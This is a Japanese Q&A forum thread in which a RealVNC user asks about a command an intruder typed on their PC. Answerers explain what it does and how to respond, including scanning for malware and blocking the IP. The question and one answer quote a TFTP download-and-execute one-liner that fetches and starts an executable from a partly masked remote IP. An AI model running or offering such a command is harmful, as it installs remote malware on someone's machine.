- ベストアンサー
一体、何のコマンドなのでしょうか?
リモートコントロールソフトrealvncをインストールして使用していたところ、操作される側のPC画面上で突然、「ファイル名を指定して実行」が開き、以下のコマンドが勝手に打ち込まれました。 %comspec% /c tftp -i 69.○○○.95.○○○ GET aipqrb.exe & start aipqrb ○の箇所には数字が入っておりipアドレスのようです。 これって何のコマンドなのでしょうか?
- ash01
- お礼率64% (376/586)
- その他(ソフトウェア)
- 回答数4
- ありがとう数2
- みんなの回答 (4)
- 専門家の回答
質問者が選んだベストアンサー
どこかのホスト(IPアドレス)に接続して airqrb.exe というファイルを自動的にダウンロードし、実行するコマンドです。 VNC経由で誰かが侵入して何かを仕込んだようです。 早急にウイルス検索、スパイウェアの検索をすることをお勧めします。 検索で見つからなくても、エクスプローラから airqrb.exe を検索して削除したり、スタートアップに何か仕込まれてないか確認した方がよいでしょう。 また、ファイヤウォールやルータのセキュリティの設定を強化して、特定のIPアドレスからしかVNC接続できないようにすることをお勧めします。
その他の回答 (3)
- qaz_qwerty_me
- ベストアンサー率19% (214/1115)
TFTP はかなり基本的な機能なので安易に削除するとOSが起動しないなどの副作用が考えられるので慎重に行って下さい。 ただし、ハッカーも、そのような点をついて今回のような方法でハッキンを行うので、#3さんの回答のように、69.○○○.95.○○○をFWで遮断するのがベストな対策と思います。 参考にTFTPの解説のURLを参照して下さい。 http://e-words.jp/w/TFTP.html *セキュリティー・ホールになるプロトコルとして結構 有名です ^ ^;
お礼
削除はやめておきます。 ファイルを見ると8月ぐらいからあったみたいなので。 ありがとうございました。
- bardfish
- ベストアンサー率28% (5029/17766)
tftpというFTPソフトを起動し、69.○○○.95.○○○というホストに接続してaipqrb.exeというプログラムをダウンロードし、実行する。 と言うものだと思います。 http://e-words.jp/w/TFTP.html なんか、危険な香りがしますね… 心配なら、そのIPアドレスをFirewallで遮断すればひとまず安心です。
補足
どうもビンゴのようです。 そういえばファイヤーウォールが「Trivial File Transfer Protocol app」を検知したので遮断しました。 早速、当該IPアドレスも遮断しておきました。 system32の中にあるtftp.exeは削除したほうがいいのでしょうか?
- qaz_qwerty_me
- ベストアンサー率19% (214/1115)
予想ですが・・・ > %comspec% /c tftp -i 69.○○○.95.○○○ GET aipqrb.exe & start aipqrb 『tftp』という部分が危険ですねぇ~ 誰かがPCをリブートして乗っ取るような感じに思われます。VNCですから知人などが操作しているなら安全ですが、見ず知らずの第三者が、このようなコマンドを実行しようとしたら・・・ハッキングとしか思えないです。
補足
入力された上記のコマンドをコピーして、コマンドプロンプトが開いたのですぐに閉じて、再起動しました。 その後、realvncの設定でパスワードやアクセスコントロールを設定しました。オンラインウイルススキャンも感染なし、aipqrb.exeというファイルも見つかりませんでした。大丈夫でしょうか?他に何か確認する方法はないでしょうか?
お礼
恐ろしいですね。 airqrb.exeは検索しましたが見つかりませんでした。 スタートアップも大丈夫そうです。 便利ですが諸刃の剣ですね。色々勉強になりました。 ありがとうございました。